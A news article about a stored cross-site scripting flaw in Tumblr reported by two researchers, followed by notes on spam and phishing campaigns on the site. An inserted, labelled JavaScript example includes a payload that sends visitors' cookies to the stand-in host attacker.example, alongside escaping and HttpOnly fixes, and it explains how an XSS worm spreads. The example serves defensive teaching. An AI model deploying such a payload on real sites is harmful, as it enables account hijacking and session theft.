Two researchers say they have found a security hole in Tumblr, one of the most popular sites on the Internet, that could be used to steal users’ authentication cookies and break into their accounts.
Aditya Gupta and Subho Halder say they have tried to contact Tumblr about the vulnerability by e-mail and Twitter, but so far no one has responded. The social sharing site hosts 59.4 million micro blogs and has published almost 25 billion posts.
The pair says they have identified a dangerous cross-site scripting (XSS) vulnerability that poses risks for the site’s users, according to the site Softpedia.
“I could get the cookies of any user who visits my profile page. They are the actual Tumblr authentication cookies, which means I could use the cookies to log in to the respective user accounts,” Gupta said. “Also, I could make a complete worm out of it, so when one person views my profile, he would repost my post and everyone in his list who would see it would then be doing the same. All automatically and without the user’s knowledge.”
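The mechanism Gupta describes is stored XSS: attacker-controlled profile content is rendered into the page unescaped, so the script runs in every visitor's browser and can read `document.cookie`. The following is an added illustration, not code from the article, from the researchers or from Tumblr, and it does not reflect how Tumblr's pages are actually built. It uses a toy profile renderer with a hypothetical `bio` field, a constructed payload pointing at a made-up host `attacker.example`, and shows the two controls that break the attack chain: HTML-escaping untrusted output, and marking the session cookie `HttpOnly` so script cannot read it even if some XSS remains.

```javascript
// Added example (not from the article, Tumblr, or the researchers).
// Toy profile renderer: the "before" inserts the user-supplied bio verbatim,
// which is exactly the stored-XSS pattern described in the article.

// Constructed payload of the kind described: read the visitor's cookies and
// send them to a hypothetical attacker-controlled host.
const COOKIE_THEFT_PAYLOAD =
  '<script>new Image().src="https://attacker.example/c?"' +
  '+encodeURIComponent(document.cookie)</script>';

// Vulnerable: untrusted bio text lands in the HTML unchanged.
function renderProfileUnsafe(bio) {
  return `<div class="bio">${bio}</div>`;
}

// Fix 1: escape the five characters that can change HTML context.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

function renderProfileSafe(bio) {
  return `<div class="bio">${escapeHtml(bio)}</div>`;
}

// Crude check used below: does the rendered markup contain a live script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Fix 2: the session cookie must be HttpOnly (and Secure) so that
// document.cookie never exposes it to injected script in the first place.
// Parses one Set-Cookie header value into its name and attribute flags.
function auditSessionCookie(setCookieHeader) {
  const parts = setCookieHeader.split(';').map(p => p.trim());
  const [name] = parts[0].split('=');
  const attrs = parts.slice(1).map(p => p.toLowerCase());
  return {
    name,
    httpOnly: attrs.includes('httponly'),
    secure: attrs.includes('secure'),
    sameSite: attrs.some(a => a.startsWith('samesite=')),
  };
}

// Stand-alone demo.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe render contains script:',
    containsScriptTag(renderProfileUnsafe(COOKIE_THEFT_PAYLOAD)));   // true
  console.log('safe render contains script:',
    containsScriptTag(renderProfileSafe(COOKIE_THEFT_PAYLOAD)));     // false
  console.log(auditSessionCookie('sid=abc123; Path=/; HttpOnly; Secure; SameSite=Lax'));
  console.log(auditSessionCookie('sid=abc123; Path=/'));             // exposed to XSS
}
```

The worm Gupta mentions follows from the same primitive: once script runs in a logged-in visitor's session, it can call the site's own post or reblog endpoints with that visitor's cookies, so each viewer republishes the payload to their followers. Output escaping removes the injection; `HttpOnly` only limits cookie theft and does not stop in-session actions, which is why the escaping fix is the one that matters.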
Gupta said he and Halder decided to tell people about the vulnerability after failing to get Tumblr’s attention but did not publicly release details to allow the site time to patch the flaw.
In May, Tumblr was hit by spam campaigns, including one designed to gain personally identifiable information through a fake dating site. Another attack posed as an outdated version of a Tumblr login page. A third scam promised to monetize users’ tumblelogs for a small fee.
“Tumblr continues to be a site that is well-trafficked by cybercriminals looking to victimize micro-bloggers with minimal effort,” said Christopher Boyd, senior threat researcher at GFI Software, in a news release. The company last week issued a report on the top threats in May that included those targeting Tumblr and Google Play users.
“More and more, cybercriminals are exploiting the familiarity of terms and images in order to distract the victim from the dangers that are present as they sign away their personal information and click on links that lead to nothing but trouble.”
Boyd added, “Cybercriminals are banking on the fact that social media users want to quickly share content and that they won’t thoroughly investigate links before spreading them to friends.”